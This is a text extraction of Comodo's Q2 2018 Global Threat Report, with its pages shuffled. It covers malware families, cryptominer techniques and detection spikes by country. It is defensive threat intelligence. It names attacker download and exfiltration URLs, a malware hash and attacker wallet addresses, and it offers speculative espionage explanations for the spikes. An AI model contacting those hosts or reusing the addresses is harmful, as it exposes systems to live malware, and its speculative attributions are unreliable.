Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 4 of 73
2 Trojans going on the offensive to hunt for confidential data The second quarter of 2018 brought a sudden change in malware competition Trojans squeezed out other malware types and jumped to the top of the charts Gaining the lionrsquos share of the malware marketplace they can radically influent on the cybersecurity landscape Their appearance makes cybersecurity departments and individual users update on their defense tactics
Malware Distribution by Type
Why are these changes inevitable
Trojans are a special kind of malware Their distinguishing feature is universality They are most effective at providing a diversity of attacks stealing data implanting ransomware adware cryptominers or even completely crashing systems
Another special feature of trojans is covert activity An owner of a trojan-infected machine can remain unaware of the attack for a long time during which the trojan is an active malefactor
Hence the need for a new approach to the defense tactic appears Letrsquos have a closer look at the most active vicious players of the trojans team to deeply understand what harm they can do to your computers if sneak inside
Global Threat Report Q2 2018 Edition
Page 5 of 73
Distribution of top 30 Malware Families
In this list of 30 top malware families where trojans overwhelmingly dominate you can find samples of this malware exhibiting diverse types of malicious activity
For example the leader of the attacks in Q2 TrojWareWin32Agent is a trojan family that clandestinely penetrates usersrsquo computers and then downloads other malware from a cybercriminal server And the downloaded malware can be of any type
Number two in the list TrojWareJSClickjack exhibits different activity it makes users unintentionally click on hidden links The link can be just another advertisement or lead to a malicious website to infect users with other types of malware
TrojWareJSFaceliker just clicks posts in Facebook on behalf of the user to promote fake or fraudulent pages The malware infects then usersrsquo browsers when they visit malicious or compromised websites Then when infected users open Facebook Faceliker hijacks their ldquolikesrdquo
TrojWareWin32Kryptik steals information from computers and sends it to the cybercriminal Command-and-Control server
Global Threat Report Q2 2018 Edition
Page 6 of 73
TrojWareWin32Injector uses process injection as the main technique to take malicious actions Its mostly used to bypass security products
TrojWareJSDownloader consists of scripts that download and execute malware from the Internet Itrsquos usually spread via a phishing email
Such diversity of malicious activity of trojans and their special ability to hide have always made them one of the hardest malware to fight But in Q2-2018 they become even more sophisticated and dangerous Comodo Cybersecurity Threat Research Labs observed especially alarming trends worthy of attention from the global cybersecurity community
First among the trends is an explosive mixture of trojans and phishing emails Earlier phishing emails mostly contained a link to a malicious website to lure victims to supply their credentials But today phishing emails have become a potent means of delivery for trojans and other malware These trojans steal credentials and private information by ferreting out infected machines in search of valuable data and then send it to cybercriminalsrsquo servers
The accompanying graph of the most popular malware spread via email Note that 18 of 20 are trojans
Distribution of Phishing Families of Malware
Global Threat Report Q2 2018 Edition
Page 7 of 73
21 The Most Widespread Trojan The most proliferated trojan TrojWareWin32Injector is designed to steal credentials from infected computers It was spread via fake email imitating a message from a shipping and trading company As seen in the screenshot the malware attached is carefully disguised with a plausible name and icon to look like a real scanned document
If a user takes the bait and runs the file it copies itself to appdata as D5E2DEE36C7Aexe then launches itself from that location and starts to gather credentials present in the system
It collects credentials and private data from known browsers email clients FTP clients WebDav SCP clients Then it sends all the collected data to the attackersrsquo server httpcallbedmlpackfarefrephp
The phishing email
Global Threat Report Q2 2018 Edition
Page 8 of 73
22 PowerShell-based attack with Emotet Another alarming trend is related to malware itself rather than its delivery method Often cybercriminals use malware based not on Windows native exe files but instead utilize PowerShell scripts and other legitimate software to infect a computer This type of attack is much harder to detect with antivirus tools
Emotet is one of the most aggressive trojans currently acting in cyberspace Spread by various infection vectors and backed by a huge network of compromised hosts it heavily affects many individuals and companies
The following attack started with the email that imitated a message from IRS about ldquoTax Account Transcriptrdquo Notice the message is written in a cheerful manner to inspire user trust
The phishing email
Global Threat Report Q2 2018 Edition
Page 9 of 73
The attached file is an Office document containing a VBScript As the settings of the newly installed Microsoft Office do not allow execution of such scripts by default the attackers added a special option to convince the victims to turn on VBScript execution
The special option to convince the victims to turn on VBScript execution
Global Threat Report Q2 2018 Edition
Page 10 of 73
The purpose of the VBScript is to launch PowerShell
Global Threat Report Q2 2018 Edition
Page 11 of 73
The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlchxxpwwwthecyberconxioncomPUqUUe hxxpEliasWesselcomvu6xGmShxxpmossbeachmusicdeXuBBN6r hxxpairmaxxrswIdY
At the time of the writing only thecyberconxioncom host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb)
The binary moves itself to CWindowsSysWOW64lanesviewerexe and creates a service ldquolanesviewerrdquo to ensure persistence
The malware creates ldquolanesviewerrdquo service to ensure persistence
Global Threat Report Q2 2018 Edition
Page 12 of 73
And after that Emotet begins it real mission ndash stealing private data from the compromised system which it then it sends to the cybercriminals Command amp Control server
The next example is even more cunning because it infects computers with popular legitimate Microsoft software
23 Flawed Ammyy RAT attack based on legitimate software Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks What is most impressive is that it is based on a legitimate software called Ammyy Admin Its history is a striking example of how malicious hackers turn legitimate tools into a tool of a thief
Ammyy Admin is Remote Desktop Software created by the Ammyy Group company It provides an easy way to establish a reliable remote desktop connection connecting remote computers within seconds without additional installation or configuration work
The dark side of this tool is that its features ideally suit the purposes of cybercriminal Unsurprisingly perpetrators tried to adopt it for their malicious activity Cybercriminals repeatedly compromised the Ammyyy Group website and replaced original Ammyy Admin software with a bundle containing malware Thus every user who downloaded Ammyy Admin became covertly infected Ammy Group cleaned up the compromised website but the attackers infected it again and this vicious сycle continued endlessly
Global Threat Report Q2 2018 Edition
Page 13 of 73
As you can see on the diagram Ammy Admin was used in spreading many types of nefarious malware
The newest version of malicious modification of Ammyy Admin is called Flawed Ammyy Itrsquos a remote access trojan (RAT) that appeared in the wild at the beginning of 2016 It got its name from the leaked source code of the third Ammyy Admin version Flawed Ammyy RAT let the attackers use functions such as Remote Desktop control File System Manager proxy support and audio chat Cybercriminals take total control of the infected host and can run amok ndash steal credentials and documents remove or add files run applications install other malware etc
The way Flaw Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users What is especially worth noticing is the fact that these tricks are also based on using a legitimate software ndash Microsoft this time
Global Threat Report Q2 2018 Edition
Page 14 of 73
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment as in the following screenshot
The phishing email
IQY files are intended for making an Internet query from MS Excel so an IQY contains a URL and other related parameters It can download files and run them directly into MS Excel
The infected IQY included a malicious URL so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell
Malware runs PowerShell
Global Threat Report Q2 2018 Edition
Page 15 of 73
Thus in this case machines face extremely dangerous and potent malware created and delivered via legitimate software This feature makes it much harder for antivirus software to detect an attack
24 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
25 Ammyy Admin dissemination around the world for Q2 As illustrated trojans became an 800-pound gorilla in the malware market in Q2 This trend will inevitably entail a change of attack vectors to covert theft and manipulating users This trend is a real gift for cybercriminals and a terrible nightmare for users
Trojans let attackers gain time As malware acts covertly the cybercriminals have more than enough time to use stolen data to their advantage In many cases attacks can only be discovered too late after money is withdrawn from a bank account or confidential data published etc Merging trojans as payloads and phishing emails as means of delivery observed during Q2 will result in a huge surge in such attacks and victims And using legitimate tools like PowerShell for running malware will amplify the number of victims even more because such attacks are much harder to detect with antiviruses
To fight these attacks cybersecurity departments need to rearrange their approach to security measures per the new trends above Combining the best detection malware tools and methods of protecting data built on defense-in-depth principles provide the most promising solution
43188
46382
48881
40000
41000
42000
43000
44000
45000
46000
47000
48000
49000
50000
Apr May Jun
Global Threat Report Q2 2018 Edition
Page 16 of 73
3 Cryptominer Evolution
Going Fileless Killing Competitors Crashing Systems Cryptominers do not lead the Q2 malware pack but it does not mean that their impact is greatly diminished On the contrary current cryptominer behavior recalls that of an army preparing for battle training reprovisioning to fight more efficiently Cryptominers are quickly developing and gaining new dangerous abilities
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers For that reason many users did not regard them as particularly dangerous at least not all cryptominers would steal information or destroy data like other malware merely sucking up CPU resources Moreover they typically do not employ strong obfuscation and can be easily discovered and deleted
But Q2 events clearly showed that the situation has radically changed
New samples of cryptominers detected by Comodo malware analysts exhibit much harmful abilities than those required for merely mining cryptocurrency These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals They are learning to hide and fight against antimalware tools They can camouflage themselves kill competing cryptominers and even crash user systems if met with an attempt to delete the malware
31 BadShell attacks enterprises Fileless malware is next-generation malware especially compared with traditional infection via exe files File-based malware resides on the hard drive making it easier to detect But fileless malware is different As its name suggests this type of malware represents malicious code injected into legitimate OS processes It need not be installed on a victim machine but functions only in memory making much harder for antiviruses to detect
Usually such malware is spread via malicious ad banners Clicking on a banner redirects a user to an infected website where the malware covertly installs itself into the victimrsquos computer As many antiviruses tools cannot detect it users remain unaware of being infected Not surprisingly its use by cybercriminals is on the increase
Last quarter Comodo Threat Research Labs analysts faced a scenario of just such an attack A company with several thousands of endpoints was compromised by fileless malware When their legacy security software failed to protect them the company looked to Comodo Threat Research Labs for assistance
Global Threat Report Q2 2018 Edition
Page 17 of 73
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes PowerShell to execute commands Task Scheduler to ensure persistence and Registry to hold the malicious binary code In the screenshots below you see how exactly the malware dubbed BadShell works
If we decode the PowerShell arguments we see the malicious code in the registry The code is injected into an existing running process by the PowerShell script
BadShell at work
Global Threat Report Q2 2018 Edition
Page 18 of 73
The malicious code in the registry
Global Threat Report Q2 2018 Edition
Page 19 of 73
This emergency clearly demonstrates how dangerous cryptominer activity can be Just imagine it the entire compute capacity of the enterprises computers was engaged in mining cryptocurrency depriving employees of the ability to perform their jobs Comodo analysts took over the situation and cleaned the infection from all involved computers but of course the financial losses of the company were irreversible
Invulnerability to an antivirus and persistence in the system are the most important attributes for a cryptominer because the more it runs within the infected system the more it profits the attackers That is why cybercriminals give special attention to the cryptominers ability to elude antivirus software
Below is another cunning technique that turns an infected machine into a slave of the attacker
32 WinstarNssmMiner a system killer Like other cryptominers The WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals But it has a special feature ndash it can root into a system so deeply that it becomes unremovable Attempting to kill it will kill the target system totally
The secret of WinstarNssmMinerrsquos persistence lies in its method of infecting a victimrsquos computer It consists of two processes injected into two system svchostexe processes The first performs the main task ndash mining cryptocurrency The other runs in the background looking for antivirus products and disables them
The malicious code disguised as svhostexe
Especially impressive is that both infected svchostexe processed possess the system attribute ldquoCriticalProcess meaning that terminating any of them will crash the system leaving the user with a blue screen
WinstarNssmMiner spreading around the world
Global Threat Report Q2 2018 Edition
Page 20 of 73
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victimsrsquo system but their cryptomining competitors
33 CoinMiner kills rivals CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware If an ldquoalienrdquo cryptominer is detected the feature will terminate its processes
CoinMiner kills its rivals as follows
The code below downloads CoinMiner for Windows architecture (x86 or x64) and then checks if a miner is already running by testing the presence of an ldquoAMDDriver64rdquo process
Global Threat Report Q2 2018 Edition
Page 21 of 73
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists named $malwares and $malwares2 with the names of the processes that it is instructed to kill The lists include other types of cryptominers
In this way CoinMiner undividedly occupies the victims computer to use its resources for mining cryptocurrency
Global Threat Report Q2 2018 Edition
Page 22 of 73
Some cryptominers earned the spotlight of the mass-media and cybersecurity researchers easing user detection In Q2 these cryptominers learned to hide CoinHive is the brightest example of them
34 CoinHive changes its skin CoinHive is a popular JavaScript cryptominer If you put its string of code into your website page every visitor to the site will mine coins for you
As you can see the CoinHive script is easily detected
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports users have started checking websites codes for cryptominers But in the second quarter perpetrators found a way to overcome this obstacle Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners
Global Threat Report Q2 2018 Edition
Page 23 of 73
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible
Now letrsquos see at the URL httpscnhvco
And there we can find the familiar link to CoinHive
The link to CoinHive
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
